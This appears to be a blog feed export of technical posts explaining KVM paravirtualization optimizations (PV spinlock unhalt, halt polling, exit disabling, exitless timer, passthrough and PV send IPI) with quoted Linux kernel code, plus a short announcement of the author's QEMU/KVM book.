<p>One of the most important things in VM optimization is to reduce VM-exits as much as possible; the ideal case is no VM-exit at all.</p>
<p>This is the second part of kvm performance optimization technologies, following up <a href="https://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/09/10/kvm-performance-1">part one</a>. This post covers the following pv optimizations:</p>
<ul>
<li>PV unhalt</li>
<li>Host/Guest halt poll</li>
<li>Disable mwait/hlt/pause</li>
<li>Exitless timer</li>
</ul>
<h3> PV unhalt </h3>
<p>Its name may be confusing; in fact it is about spinlocks.
In a virtualization environment, the vcpu holding a spinlock may be preempted by the scheduler. Another vcpu trying to get the spinlock will then spin until the holder vcpu is scheduled again, which may take quite a long time.</p>
<p>The PV unhalt feature sets pv_lock_ops to replace the native spinlock functions with better optimized ones. More references can be found <a href="https://wiki.xen.org/wiki/Benchmarking_the_new_PV_ticketlock_implementation">here</a> and <a href="http://www.xen.org/files/xensummitboston08/LHP.pdf">here</a>.</p>
<p>Though the concrete implementation of pv spinlock depends on the spinlock flavor, such as ticketlock or queued spinlock, the basic idea is the same: instead of spinning while it cannot get the spinlock, the vcpu executes the halt instruction and lets another vcpu be scheduled.</p>
<h4> guest side </h4>
<p>When the guest starts up, ‘kvm_spinlock_init’ is used to initialize the pv spinlock.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void __init kvm_spinlock_init(void)
{
/* Does host kernel support KVM_FEATURE_PV_UNHALT? */
if (!kvm_para_has_feature(KVM_FEATURE_PV_UNHALT))
return;
if (kvm_para_has_hint(KVM_HINTS_REALTIME))
return;
/* Don't use the pvqspinlock code if there is only 1 vCPU. */
if (num_possible_cpus() == 1)
return;
__pv_init_lock_hash();
pv_ops.lock.queued_spin_lock_slowpath = __pv_queued_spin_lock_slowpath;
pv_ops.lock.queued_spin_unlock =
PV_CALLEE_SAVE(__pv_queued_spin_unlock);
pv_ops.lock.wait = kvm_wait;
pv_ops.lock.kick = kvm_kick_cpu;
if (kvm_para_has_feature(KVM_FEATURE_STEAL_TIME)) {
pv_ops.lock.vcpu_is_preempted =
PV_CALLEE_SAVE(__kvm_vcpu_is_preempted);
}
}
</code></pre></div></div>
<p>The most important functions are ‘kvm_wait’ and ‘kvm_kick_cpu’. ‘kvm_wait’ is called through ‘pv_wait’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static __always_inline void pv_wait(u8 *ptr, u8 val)
{
PVOP_VCALL2(lock.wait, ptr, val);
}
</code></pre></div></div>
<p>Then it will execute the halt instruction in ‘kvm_wait’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void kvm_wait(u8 *ptr, u8 val)
{
unsigned long flags;
if (in_nmi())
return;
local_irq_save(flags);
if (READ_ONCE(*ptr) != val)
goto out;
/*
* halt until it's our turn and kicked. Note that we do safe halt
* for irq enabled case to avoid hang when lock info is overwritten
* in irq spinlock slowpath and no spurious interrupt occur to save us.
*/
if (arch_irqs_disabled_flags(flags))
halt();
else
safe_halt();
out:
local_irq_restore(flags);
}
</code></pre></div></div>
<p>When a vcpu cannot get the spinlock, the ‘wait’ callback will be called.
When a waiting vcpu can get the spinlock, the ‘kick’ callback will be called through ‘pv_kick’: ‘kvm_kick_cpu’ is invoked and triggers a KVM_HC_KICK_CPU hypercall.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void kvm_kick_cpu(int cpu)
{
int apicid;
unsigned long flags = 0;
apicid = per_cpu(x86_cpu_to_apicid, cpu);
kvm_hypercall2(KVM_HC_KICK_CPU, flags, apicid);
}
</code></pre></div></div>
<h4> kvm side </h4>
<p>First of all, kvm should expose ‘KVM_FEATURE_PV_UNHALT’ to the guest.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> case KVM_CPUID_FEATURES:
entry->eax = (1 << KVM_FEATURE_CLOCKSOURCE) |
(1 << KVM_FEATURE_NOP_IO_DELAY) |
(1 << KVM_FEATURE_CLOCKSOURCE2) |
(1 << KVM_FEATURE_ASYNC_PF) |
(1 << KVM_FEATURE_PV_EOI) |
(1 << KVM_FEATURE_CLOCKSOURCE_STABLE_BIT) |
(1 << KVM_FEATURE_PV_UNHALT) |
...
</code></pre></div></div>
<p>When the guest executes the halt instruction, ‘kvm_emulate_halt’->‘kvm_vcpu_halt’ will be called. This sets ‘vcpu->arch.mp_state’ to ‘KVM_MP_STATE_HALTED’. Then ‘vcpu_block’ will be called to block this vcpu.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static inline int vcpu_block(struct kvm *kvm, struct kvm_vcpu *vcpu)
{
if (!kvm_arch_vcpu_runnable(vcpu) &&
(!kvm_x86_ops.pre_block || kvm_x86_ops.pre_block(vcpu) == 0)) {
srcu_read_unlock(&kvm->srcu, vcpu->srcu_idx);
kvm_vcpu_block(vcpu);
vcpu->srcu_idx = srcu_read_lock(&kvm->srcu);
if (kvm_x86_ops.post_block)
kvm_x86_ops.post_block(vcpu);
if (!kvm_check_request(KVM_REQ_UNHALT, vcpu))
return 1;
}
kvm_apic_accept_events(vcpu);
switch(vcpu->arch.mp_state) {
case KVM_MP_STATE_HALTED:
vcpu->arch.pv.pv_unhalted = false;
vcpu->arch.mp_state =
KVM_MP_STATE_RUNNABLE;
/* fall through */
case KVM_MP_STATE_RUNNABLE:
vcpu->arch.apf.halted = false;
break;
case KVM_MP_STATE_INIT_RECEIVED:
break;
default:
return -EINTR;
}
return 1;
}
</code></pre></div></div>
<p>When the guest triggers the ‘KVM_HC_KICK_CPU’ hypercall, ‘kvm_pv_kick_cpu_op’ and ‘kvm_sched_yield’ will be called.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int kvm_emulate_hypercall(struct kvm_vcpu *vcpu)
{
case KVM_HC_KICK_CPU:
kvm_pv_kick_cpu_op(vcpu->kvm, a0, a1);
kvm_sched_yield(vcpu->kvm, a1);
}
</code></pre></div></div>
<p>The ‘kvm_pv_kick_cpu_op’ will send an interrupt to the lapic.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void kvm_pv_kick_cpu_op(struct kvm *kvm, unsigned long flags, int apicid)
{
struct kvm_lapic_irq lapic_irq;
lapic_irq.shorthand = APIC_DEST_NOSHORT;
lapic_irq.dest_mode = APIC_DEST_PHYSICAL;
lapic_irq.level = 0;
lapic_irq.dest_id = apicid;
lapic_irq.msi_redir_hint = false;
lapic_irq.delivery_mode = APIC_DM_REMRD;
kvm_irq_delivery_to_apic(kvm, NULL, &lapic_irq, NULL);
}
</code></pre></div></div>
<p>Then in ‘__apic_accept_irq’ it will kick the blocked vcpu.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> case APIC_DM_REMRD:
result = 1;
vcpu->arch.pv.pv_unhalted = 1;
kvm_make_request(KVM_REQ_EVENT, vcpu);
kvm_vcpu_kick(vcpu);
break;
</code></pre></div></div>
<p>When ‘kvm_vcpu_block’ returns, it sets ‘vcpu->arch.mp_state’ to ‘KVM_MP_STATE_RUNNABLE’ and lets the vcpu get the spinlock.</p>
<h3> Host/Guest halt poll </h3>
<p>Under some circumstances the overhead of the context switch from idle->running or running->idle is high, especially for the halt instruction.
With host halt poll, when the vcpu executes the halt instruction and causes a VM-exit, the ‘kvm_vcpu_block’ function polls for wakeup conditions before giving the cpu back to the scheduler.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> if (vcpu->halt_poll_ns && !kvm_arch_no_poll(vcpu)) {
ktime_t stop = ktime_add_ns(ktime_get(), vcpu->halt_poll_ns);
++vcpu->stat.halt_attempted_poll;
do {
/*
* This sets KVM_REQ_UNHALT if an interrupt
* arrives.
*/
if (kvm_vcpu_check_block(vcpu) < 0) {
++vcpu->stat.halt_successful_poll;
if (!vcpu_valid_wakeup(vcpu))
++vcpu->stat.halt_poll_invalid;
goto out;
}
poll_end = cur = ktime_get();
} while (single_task_running() && ktime_before(cur, stop));
}
</code></pre></div></div>
<p>This code is quite simple: if the condition has come, it will ‘goto out’ and the vcpu will not be blocked.</p>
<p>Guest halt poll is a solution to avoid this overhead: it polls in the guest kernel instead of the host kernel.
Compared with kvm halt poll, guest halt poll also avoids the context switch from non-root mode to root mode.</p>
<p>Before entering halt, the guest will poll for some time.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int __cpuidle poll_idle(struct cpuidle_device *dev,
struct cpuidle_driver *drv, int index)
{
u64 time_start = local_clock();
dev->poll_time_limit = false;
local_irq_enable();
if (!current_set_polling_and_test()) {
unsigned int loop_count = 0;
u64 limit;
limit = cpuidle_poll_time(drv, dev);
while (!need_resched()) {
cpu_relax();
if (loop_count++ < POLL_IDLE_RELAX_COUNT)
continue;
loop_count = 0;
if (local_clock() - time_start > limit) {
dev->poll_time_limit = true;
break;
}
}
}
current_clr_polling();
return index;
}
</code></pre></div></div>
<p>When sending an IPI to a cpu, the sender checks whether the polling flag is set; if it is, it just sets ‘_TIF_NEED_RESCHED’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static bool set_nr_if_polling(struct task_struct *p)
{
struct thread_info *ti = task_thread_info(p);
typeof(ti->flags) old, val = READ_ONCE(ti->flags);
for (;;) {
if (!(val & _TIF_POLLING_NRFLAG))
return false;
if (val & _TIF_NEED_RESCHED)
return true;
old = cmpxchg(&ti->flags, val, val | _TIF_NEED_RESCHED);
if (old == val)
break;
val = old;
}
return true;
}
void send_call_function_single_ipi(int cpu)
{
struct rq *rq = cpu_rq(cpu);
if (!set_nr_if_polling(rq->idle))
arch_send_call_function_single_ipi(cpu);
else
trace_sched_wake_idle_without_ipi(cpu);
}
</code></pre></div></div>
<p>This avoids sending the IPI interrupt.</p>
<p>There is a cpuid feature bit ‘KVM_FEATURE_POLL_CONTROL’ that controls which halt poll is used.
When the host exposes this feature, the guest can disable host halt poll and use guest halt poll instead.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void arch_haltpoll_enable(unsigned int cpu)
{
if (!kvm_para_has_feature(KVM_FEATURE_POLL_CONTROL)) {
pr_err_once("kvm: host does not support poll control\n");
pr_err_once("kvm: host upgrade recommended\n");
return;
}
/* Enable guest halt poll disables host halt poll */
smp_call_function_single(cpu, kvm_disable_host_haltpoll, NULL, 1);
}
EXPORT_SYMBOL_GPL(arch_haltpoll_enable);
void arch_haltpoll_disable(unsigned int cpu)
{
if (!kvm_para_has_feature(KVM_FEATURE_POLL_CONTROL))
return;
/* Enable guest halt poll disables host halt poll */
smp_call_function_single(cpu, kvm_enable_host_haltpoll, NULL, 1);
}
</code></pre></div></div>
<h3> Disable mwait/hlt/pause </h3>
<p>In some workloads, latency improves if mwait/hlt/pause don’t cause a VM-exit. Userspace (qemu) can check and set the per-VM capability (KVM_CAP_X86_DISABLE_EXITS) so that the mwait/hlt/pause instructions are not intercepted.</p>
<p>‘kvm_arch’ has the following fields, which userspace can set:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> bool mwait_in_guest;
bool hlt_in_guest;
bool pause_in_guest;
bool cstate_in_guest;
</code></pre></div></div>
<p>During VM initialization, kvm checks these fields and sets the corresponding vmcs fields. For example, the mwait and hlt case:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> u32 vmx_exec_control(struct vcpu_vmx *vmx)
{
...
if (kvm_mwait_in_guest(vmx->vcpu.kvm))
exec_control &= ~(CPU_BASED_MWAIT_EXITING |
CPU_BASED_MONITOR_EXITING);
if (kvm_hlt_in_guest(vmx->vcpu.kvm))
exec_control &= ~CPU_BASED_HLT_EXITING;
return exec_control;
}
</code></pre></div></div>
<h3> Exitless timer </h3>
<p>This feature is also implemented by Wanpeng Li. Here is the <a href="https://static.sched.com/hosted_files/kvmforum2019/e3/Boosting%20Dedicated%20Instances%20by%20KVM%20Tax%20Cut.pdf">slides</a>. The patches is <a href="https://patchwork.kernel.org/cover/11033533/">here</a>.</p>
<p>Both programming the timer in the guest and the emulated timer firing cause VM-exits. The exitless timer uses housekeeping CPUs to deliver the timer interrupt via posted interrupts.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void apic_timer_expired(struct kvm_lapic *apic, bool from_timer_fn)
{
struct kvm_vcpu *vcpu = apic->vcpu;
struct kvm_timer *ktimer = &apic->lapic_timer;
if (atomic_read(&apic->lapic_timer.pending))
return;
if (apic_lvtt_tscdeadline(apic) || ktimer->hv_timer_in_use)
ktimer->expired_tscdeadline = ktimer->tscdeadline;
...
if (kvm_use_posted_timer_interrupt(apic->vcpu)) {
if (apic->lapic_timer.timer_advance_ns)
__kvm_wait_lapic_expire(vcpu);
kvm_apic_inject_pending_timer_irqs(apic);
return;
}
atomic_inc(&apic->lapic_timer.pending);
kvm_set_pending_timer(vcpu);
}
</code></pre></div></div>
<p>‘kvm_apic_inject_pending_timer_irqs’ is used to inject the timer interrupt.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void kvm_apic_inject_pending_timer_irqs(struct kvm_lapic *apic)
{
struct kvm_timer *ktimer = &apic->lapic_timer;
kvm_apic_local_deliver(apic, APIC_LVTT);
if (apic_lvtt_tscdeadline(apic)) {
ktimer->tscdeadline = 0;
} else if (apic_lvtt_oneshot(apic)) {
ktimer->tscdeadline = 0;
ktimer->target_expiration = 0;
}
}
</code></pre></div></div>
<p>It just delivers an APIC_LVTT timer interrupt to the apic. This goes to the ‘case APIC_DM_FIXED’ in ‘__apic_accept_irq’, and the timer interrupt is then injected through posted interrupts.</p>
My qemu/kvm book has been published2020-09-11T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/09/11/book
<p>During my study and work on virtualization, I have had to dig into the code. There is a lot of code to analyze: SeaBIOS, the Linux kernel drivers, QEMU and so on.
In this exciting journey I have written a lot of virtualization-related material, and many people have asked me questions while reading my blog.</p>
<p>Two years ago I decided to write a qemu/kvm book, not only because it can help people but also as a memorial of my virtualization exploration. After countless nights and weekends of hard work, it has finally arrived.</p>
<p><img src="/assets/img/book/1.jpg" alt="" /></p>
<p>Its Chinese name is 《QEMU/KVM源码解析与应用》; I think its English name could be ‘QEMU/KVM Internals’.</p>
<p>The book contains a very detailed analysis of qemu/kvm-related virtualization technologies:</p>
<ul>
<li>Basic building blocks such as the event loop framework, the thread model and QOM</li>
<li>Firmware emulation, including a SeaBIOS analysis</li>
<li>CPU emulation, memory emulation, device emulation and interrupt emulation</li>
<li>Misc topics such as VM migration, QGA and qemu security</li>
</ul>
<p>It can be found in following websites:</p>
<ul>
<li><a href="https://www.taobao.com/">taobao.com</a></li>
<li><a href="https://www.jd.com/">jd.com</a></li>
<li><a href="http://www.dangdang.com/">dangdang.com</a></li>
</ul>
kvm performance optimization technologies, part one2020-09-10T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/09/10/kvm-performance-1
<p>In full virtualization the guest OS is not aware that it is running in a VM. If the OS knows it is running in a VM, it can do some optimizations to improve performance. This is called para-virtualization (pv). Generally speaking, any technology in the guest OS that relies on the assumption that it is running in a VM can be called a pv technology. For example, virtio is a pv framework, and the <a href="https://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/03/24/kvm-async-page-fault">apf</a> is also a pv feature. However, in this post I will not talk about these more complicated features but about some smaller pv performance optimizations.</p>
<p>One of the most important things in VM optimization is to reduce VM-exits as much as possible; the ideal case is no VM-exit at all.</p>
<p>This post covers the following pv optimizations:</p>
<ul>
<li>Passthrough IPI</li>
<li>PV Send IPI</li>
<li>PV TLB Shootdown</li>
<li>PV sched yield</li>
<li>PV EOI</li>
</ul>
<h3> Passthrough IPI </h3>
<p>Let’s first take an example of a PV feature proposed by bytedance, which also has a <a href="https://dl.acm.org/doi/abs/10.1145/3381052.3381317">paper</a>.
It is <a href="https://www.spinics.net/lists/kvm/msg224093.html">Passthrough IPI</a>.</p>
<p>When the guest issues an IPI, it writes the ICR register of the LAPIC. This normally causes a VM-exit, as the LAPIC is emulated by the vmm.
‘Passthrough IPI’ tries to avoid this VM-exit and VM-entry by exposing the posted-interrupt capability to the guest. The following picture, from the paper above, shows the basic idea.</p>
<p><img src="/assets/img/pvfeature/1.png" alt="" /></p>
<p>The following picture shows more details of this feature.</p>
<p><img src="/assets/img/pvfeature/2.png" alt="" /></p>
<h4> kvm side </h4>
<p>When creating a VM, userspace should set the gpa mapping of the pi_desc via ioctl(KVM_SET_PVIPI_ADDR).
‘vmx_set_pvipi_addr’ will set up the ept table for this gpa.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +static int vmx_set_pvipi_addr(struct kvm *kvm, unsigned long addr)
+{
+ int ret;
+
+ if (!enable_apicv || !x2apic_enabled())
+ return 0;
+
+ if (!IS_ALIGNED(addr, PAGE_SIZE)) {
+ pr_err("addr is not aligned\n");
+ return 0;
+ }
+
+ ret = x86_set_memory_region(kvm, PVIPI_PAGE_PRIVATE_MEMSLOT, addr,
+ PAGE_SIZE * PI_DESC_PAGES);
+ if (ret)
+ return ret;
+
+ to_kvm_vmx(kvm)->pvipi_gfn = addr >> PAGE_SHIFT;
+ kvm_pvipi_init(kvm, to_kvm_vmx(kvm)->pvipi_gfn);
+
+ return ret;
+
+}
</code></pre></div></div>
<p>‘kvm_pvipi_init’ will store the pvipi addr.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +void kvm_pvipi_init(struct kvm *kvm, u64 pi_desc_gfn)
+{
+ kvm->arch.pvipi.addr = pi_desc_gfn;
+ kvm->arch.pvipi.count = PI_DESC_PAGES;
+ /* make sure addr and count is visible before set valid bit */
+ smp_wmb();
+ kvm->arch.pvipi.valid = 1;
+}
</code></pre></div></div>
<p>When creating a vcpu, kvm sets up the pi_desc page.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +static int pi_desc_setup(struct kvm_vcpu *vcpu)
+{
+ struct kvm_vmx *kvm_vmx = to_kvm_vmx(vcpu->kvm);
+ struct page *page;
+ int page_index, ret = 0;
+
+ page_index = vcpu->vcpu_id / PI_DESC_PER_PAGE;
+
+ /* pin pages in memory */
+ /* TODO: allow to move those page to support memory unplug.
+ * See commtnes in kvm_vcpu_reload_apic_access_page for details.
+ */
+ page = kvm_vcpu_gfn_to_page(vcpu, kvm_vmx->pvipi_gfn + page_index);
+ if (is_error_page(page)) {
+ ret = -EFAULT;
+ goto out;
+ }
+
+ to_vmx(vcpu)->pi_desc = page_address(page)
+ + vcpu->vcpu_id * PI_DESC_SIZE;
+out:
+ return ret;
+}
</code></pre></div></div>
<p>We can see this pi_desc is shared between the ‘guest’ and the vcpu struct.</p>
<p>The guest can read the ‘MSR_KVM_PV_IPI’ to get this shared pi_desc.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> + case MSR_KVM_PV_IPI:
+ msr_info->data =
+ (vcpu->kvm->arch.pvipi.msr_val & ~(u64)0x1) |
+ vcpu->arch.pvipi_enabled;
+ break;
</code></pre></div></div>
<p>The guest can write ‘MSR_KVM_PV_IPI’ to enable or disable this feature.
If the guest disables the feature, kvm will intercept the ‘X2APIC_MSR(APIC_ICR)’ MSR
and ‘pvipi_enabled’ is false. If the guest enables the feature, kvm will not
intercept the ‘X2APIC_MSR(APIC_ICR)’ MSR, which allows the guest to write this MSR directly.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> + case MSR_KVM_PV_IPI:
+ if (!vcpu->kvm->arch.pvipi.valid)
+ break;
+
+ /* Userspace (e.g., QEMU) initiated disabling PV IPI */
+ if (msr_info->host_initiated && !(data & KVM_PV_IPI_ENABLE)) {
+ vmx_enable_intercept_for_msr(vmx->vmcs01.msr_bitmap,
+ X2APIC_MSR(APIC_ICR),
+ MSR_TYPE_RW);
+ vcpu->arch.pvipi_enabled = false;
+ pr_debug("host-initiated disabling PV IPI on vcpu %d\n",
+ vcpu->vcpu_id);
+ break;
+ }
+
+ if (!kvm_x2apic_mode(vcpu))
+ break;
+
+ if (data & KVM_PV_IPI_ENABLE && !vcpu->arch.pvipi_enabled) {
+ vmx_disable_intercept_for_msr(vmx->vmcs01.msr_bitmap,
+ X2APIC_MSR(APIC_ICR), MSR_TYPE_RW);
+ vcpu->arch.pvipi_enabled = true;
+ pr_emerg("enable pv ipi for vcpu %d\n", vcpu->vcpu_id);
+ }
+ break;
</code></pre></div></div>
<h4> guest side </h4>
<p>When the guest starts up, it checks the ‘KVM_FEATURE_PV_IPI’ feature and, if it exists, ‘kvm_setup_pv_ipi2’ will be called.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +static int kvm_setup_pv_ipi2(void)
+{
+ union pvipi_msr msr;
+
+ rdmsrl(MSR_KVM_PV_IPI, msr.msr_val);
+
+ if (msr.valid != 1)
+ return -EINVAL;
+
+ if (msr.enable) {
+ /* set enable bit and read back. */
+ wrmsrl(MSR_KVM_PV_IPI, msr.msr_val | KVM_PV_IPI_ENABLE);
+
+ rdmsrl(MSR_KVM_PV_IPI, msr.msr_val);
+
+ if (!(msr.msr_val & KVM_PV_IPI_ENABLE)) {
+ pr_emerg("pv ipi enable failed\n");
+ iounmap(pi_desc_page);
+ return -EINVAL;
+ }
+
+ goto out;
+ } else {
+
+ pi_desc_page = ioremap_cache(msr.addr << PAGE_SHIFT,
+ PAGE_SIZE << msr.count);
+
+ if (!pi_desc_page)
+ return -ENOMEM;
+
+
+ pr_emerg("pv ipi msr val %lx, pi_desc_page %lx, %lx\n",
+ (unsigned long)msr.msr_val,
+ (unsigned long)pi_desc_page,
+ (unsigned long)&pi_desc_page[1]);
+
+ /* set enable bit and read back. */
+ wrmsrl(MSR_KVM_PV_IPI, msr.msr_val | KVM_PV_IPI_ENABLE);
+
+ rdmsrl(MSR_KVM_PV_IPI, msr.msr_val);
+
+ if (!(msr.msr_val & KVM_PV_IPI_ENABLE)) {
+ pr_emerg("pv ipi enable failed\n");
+ iounmap(pi_desc_page);
+ return -EINVAL;
+ }
+ apic->send_IPI = kvm_send_ipi;
+ apic->send_IPI_mask = kvm_send_ipi_mask2;
+ apic->send_IPI_mask_allbutself = kvm_send_ipi_mask_allbutself2;
+ apic->send_IPI_allbutself = kvm_send_ipi_allbutself2;
+ apic->send_IPI_all = kvm_send_ipi_all2;
+ apic->icr_read = kvm_icr_read;
+ apic->icr_write = kvm_icr_write;
+ pr_emerg("pv ipi enabled\n");
+ }
+out:
+ pr_emerg("pv ipi KVM setup real PV IPIs for cpu %d\n",
+ smp_processor_id());
+
+ return 0;
}
</code></pre></div></div>
<p>This function reads the shared pi_desc’s GPA. If the feature is not yet enabled, it maps this GPA to a GVA by calling ‘ioremap_cache’, then writes ‘MSR_KVM_PV_IPI’ with the enable bit set. The function also replaces the apic callbacks with its own.</p>
<p>In order for the guest to access the LAPIC’s ICR, this feature introduces an ‘MSR_KVM_PV_ICR’ MSR to expose the physical LAPIC’s ICR to the VM.</p>
<h4> guest trigger IPI </h4>
<p>When the guest sends an IPI, ‘kvm_send_ipi’ is called.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +static void kvm_send_ipi(int cpu, int vector)
+{
+ /* In x2apic mode, apicid is equal to vcpu id.*/
+ u32 vcpu_id = per_cpu(x86_cpu_to_apicid, cpu);
+ unsigned int nv, dest/* , val */;
+
+ x2apic_wrmsr_fence();
+
+ WARN(vector == NMI_VECTOR, "try to deliver NMI");
+
+ /* TODO: rollback to old approach. */
+ if (vcpu_id >= MAX_PI_DESC)
+ return;
+
+ if (pi_test_and_set_pir(vector, &pi_desc_page[vcpu_id]))
+ return;
+
+ if (pi_test_and_set_on(&pi_desc_page[vcpu_id]))
+ return;
+
+ nv = pi_desc_page[vcpu_id].nv;
+ dest = pi_desc_page[vcpu_id].ndst;
+
+ x2apic_send_IPI_dest(dest, nv, APIC_DEST_PHYSICAL);
+
+}
</code></pre></div></div>
<p>As we can see, it gets ‘nv’ and ‘dest’ from the shared pi_desc page and calls ‘x2apic_send_IPI_dest’ to send the posted-interrupt notification vector to the ‘dest’ vcpu. From the LAPIC’s view this is just a posted interrupt: if the guest is running, it triggers virtual interrupt delivery; if the guest is preempted, the vcpu will be kicked to run.</p>
<h3> PV send IPI </h3>
<p>Wanpeng Li from Tencent also proposed a pv ipi feature, which was merged upstream. The following picture shows the idea, from <a href="https://static.sched.com/hosted_files/kvmforum2019/e3/Boosting%20Dedicated%20Instances%20by%20KVM%20Tax%20Cut.pdf">Boosting Dedicated Instance via KVM Tax Cut</a>.</p>
<p><img src="/assets/img/pvfeature/3.png" alt="" /></p>
<p>Instead of sending IPIs to vcpus one by one, pv send IPI uses a bitmap to record the IPI target vcpus and then makes a single hypercall, thus reducing VM-exits.
The patchset is <a href="https://lkml.org/lkml/2018/7/23/108">here</a>. Let’s see some details.</p>
<h4> kvm side </h4>
<p>kvm should expose the pv send ipi feature.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> @@ -621,7 +621,8 @@ static inline int __do_cpuid_ent(struct kvm_cpuid_entry2 *entry, u32 function,
(1 << KVM_FEATURE_CLOCKSOURCE_STABLE_BIT) |
(1 << KVM_FEATURE_PV_UNHALT) |
(1 << KVM_FEATURE_PV_TLB_FLUSH) |
- (1 << KVM_FEATURE_ASYNC_PF_VMEXIT);
+ (1 << KVM_FEATURE_ASYNC_PF_VMEXIT) |
+ (1 << KVM_FEATURE_PV_SEND_IPI);
</code></pre></div></div>
<p>The kvm side should also implement the hypercall.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +/*
+ * Return 0 if successfully added and 1 if discarded.
+ */
+static int kvm_pv_send_ipi(struct kvm *kvm, unsigned long ipi_bitmap_low,
+ unsigned long ipi_bitmap_high, int min, int vector, int op_64_bit)
+{
+ int i;
+ struct kvm_apic_map *map;
+ struct kvm_vcpu *vcpu;
+ struct kvm_lapic_irq irq = {
+ .delivery_mode = APIC_DM_FIXED,
+ .vector = vector,
+ };
+ int cluster_size = op_64_bit ? 64 : 32;
+
+ rcu_read_lock();
+ map = rcu_dereference(kvm->arch.apic_map);
+
+ for_each_set_bit(i, &ipi_bitmap_low, cluster_size) {
+ vcpu = map->phys_map[min + i]->vcpu;
+ if (!kvm_apic_set_irq(vcpu, &irq, NULL))
+ return 1;
+ }
+
+ for_each_set_bit(i, &ipi_bitmap_high, cluster_size) {
+ vcpu = map->phys_map[min + i + cluster_size]->vcpu;
+ if (!kvm_apic_set_irq(vcpu, &irq, NULL))
+ return 1;
+ }
+
+ rcu_read_unlock();
+ return 0;
+}
+
void kvm_vcpu_deactivate_apicv(struct kvm_vcpu *vcpu)
{
vcpu->arch.apicv_active = false;
@@ -6739,6 +6773,9 @@ int kvm_emulate_hypercall(struct kvm_vcpu *vcpu)
case KVM_HC_CLOCK_PAIRING:
ret = kvm_pv_clock_pairing(vcpu, a0, a1);
break;
+ case KVM_HC_SEND_IPI:
+ ret = kvm_pv_send_ipi(vcpu->kvm, a0, a1, a2, a3, op_64_bit);
+ break;
#endif
</code></pre></div></div>
<p>As we can see, in the hypercall handler ‘kvm_pv_send_ipi’ iterates the bitmap and calls ‘kvm_apic_set_irq’ to send the interrupt to each destination vcpu.</p>
<h4> guest side </h4>
<p>When the system starts up, it checks whether ‘KVM_FEATURE_PV_SEND_IPI’ exists. If it does,
‘kvm_setup_pv_ipi’ will be called and the apic callbacks will be replaced with the pv IPI ones.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +static void kvm_setup_pv_ipi(void)
+{
+ apic->send_IPI_mask = kvm_send_ipi_mask;
+ apic->send_IPI_mask_allbutself = kvm_send_ipi_mask_allbutself;
+ apic->send_IPI_allbutself = kvm_send_ipi_allbutself;
+ apic->send_IPI_all = kvm_send_ipi_all;
+ pr_info("KVM setup pv IPIs\n");
+}
</code></pre></div></div>
<h4> guest trigger IPI </h4>
<p>‘__send_ipi_mask’ is called to send IPIs to the target vcpus.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +static void __send_ipi_mask(const struct cpumask *mask, int vector)
+{
+ unsigned long flags;
+ int cpu, apic_id, min = 0, max = 0;
+#ifdef CONFIG_X86_64
+ __uint128_t ipi_bitmap = 0;
+ int cluster_size = 128;
+#else
+ u64 ipi_bitmap = 0;
+ int cluster_size = 64;
+#endif
+
+ if (cpumask_empty(mask))
+ return;
+
+ local_irq_save(flags);
+
+ for_each_cpu(cpu, mask) {
+ apic_id = per_cpu(x86_cpu_to_apicid, cpu);
+ if (!ipi_bitmap) {
+ min = max = apic_id;
+ } else if (apic_id < min && max - apic_id < cluster_size) {
+ ipi_bitmap <<= min - apic_id;
+ min = apic_id;
+ } else if (apic_id < min + cluster_size) {
+ max = apic_id < max ? max : apic_id;
+ } else {
+ kvm_hypercall4(KVM_HC_SEND_IPI, (unsigned long)ipi_bitmap,
+ (unsigned long)(ipi_bitmap >> BITS_PER_LONG), min, vector);
+ min = max = apic_id;
+ ipi_bitmap = 0;
+ }
+ __set_bit(apic_id - min, (unsigned long *)&ipi_bitmap);
+ }
+
+ if (ipi_bitmap) {
+ kvm_hypercall4(KVM_HC_SEND_IPI, (unsigned long)ipi_bitmap,
+ (unsigned long)(ipi_bitmap >> BITS_PER_LONG), min, vector);
+ }
+
+ local_irq_restore(flags);
+}
</code></pre></div></div>
